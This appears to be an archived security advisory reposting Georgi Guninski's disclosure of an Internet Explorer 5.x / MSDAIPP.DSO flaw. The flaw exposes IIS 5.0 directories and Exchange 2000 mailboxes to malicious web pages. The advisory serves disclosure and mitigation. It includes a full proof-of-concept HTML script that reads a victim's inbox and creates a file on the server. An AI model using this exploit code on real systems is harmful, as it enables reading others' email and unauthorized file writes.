COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.x (Win2K, probably others) but interaction with IIS 5.0 (or Exchange web storage) is required

PROBLEM

    Following is based on a Georgi Guninski security advisory #40.  If
    a malicous web page is browsed with IE it is possible to list  the
    directories of  arbitrary IIS  5.0 servers  to which  the browsing
    user has access.  Under  certain circumtances it is also  possible
    to read the user's email or folders if it is stored on an Exchange
    2000  server  with  web  storage  (it  uses  IIS 5.0).  It is also
    possible to create (or probably modify) files on the Exchange 2000
    server with web storage.

    This is a complex problem.  The probem seems to be "Microsoft  OLE
    DB Provider for Internet Publishing" (MSDAIPP.DSO).  Basically  it
    gives scripting interface for accessing and manipulating object on
    IIS 5.0 or web  storage.  The problem  is it allows connecting  to
    arbitrary servers, not only to the server from which the html page
    is loaded.  Which is worse,  if the IIS 5.0 is in  "Local intranet
    zone"  IE  by  default  automatically  authenticates to it without
    prompting the user.

    Here is an example.  The following example msdaippdemo.html  works
    for me,  don't know  for you,  let me  know if  it does  not work.
    msdaippdemo.html may reside anywhere on the internet.  It contains
    two "variables" that must  be changed - INTRASERVER  and USERNAME.
    If msdaipp.html  is browsed  with IE  5.x by  user USERNAME (in NT
    DOMAIN) and  INTRASERVER is  IIS 5.0  with Exchange  2000 with web
    storage (note: INTRASERVER must be  a name which is in  the "Local
    intranet zone" in  the context of  USERNAME) then an  attacker may
    obtain  all  the  messages  in  USERNAME's  inbox and send them to
    arbitrary server  and in  addition a  file "newlycreatedfile.html"
    shall be  created in  USERNAME's inbox.   In order  the attack  to
    succeed the attacker must know the names INTRASERVER and  USERNAME
    (and  change  them  in  msdaippdemo.html)  But  if the attacker is
    insider in the NT  DOMAIN he knows both  of them, so basically  it
    allows playing with other people's Exchange 2000 with web  storage
    mailboxes.   If INTRASERVER  is running  just plain  IIS 5.0  with
    Indexing service enabled a directory listing shall be obtained  if
    you edit the example a little - change

        Data Source=http://INTRASERVER/

    msdaippdemo.html:

    <HTML>
    Written by Georgi Guninski
    <SCRIPT>
    function f()
    {
    conn=new ActiveXObject("ADODB.Connection");
    conn.ConnectionString='Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox';
    //change INTRASERVER and USERNAME with real values
    rec=new ActiveXObject("ADODB.Record");
    conn.Open();
    rs=new ActiveXObject("ADODB.Recordset");
    rs.Open("SELECT * from SCOPE()",conn);
    win=window.open("about:blank");
    win.document.open();
    // DISPLAYS ALL MESSAGES FROM USER'S INBOX
    while (!rs.EOF)
    {
    for(i=0;i<rs.Fields.Count;i++)
     {
     win.document.writeln(rs.Fields(i).Name+"="+rs.Fields(i).Value+"<BR>");
     }
    rs.MoveNext();
    }
    rec.Open ("newlycreatedfile.html",conn,3,0); //create file newlycreatedfile.html
    win.document.close();
    }
    setTimeout("f()",1000);
    </SCRIPT>
    </HTML>

SOLUTION

    To solve  this particular  issue disable  Active Scripting, though
    we do  not recommend  using IE  for browsing  the Internet because
    this is dangerous.

    secure@microsoft.com wrote  "Visiting malicious  web sites  is not
    real exploit scenario"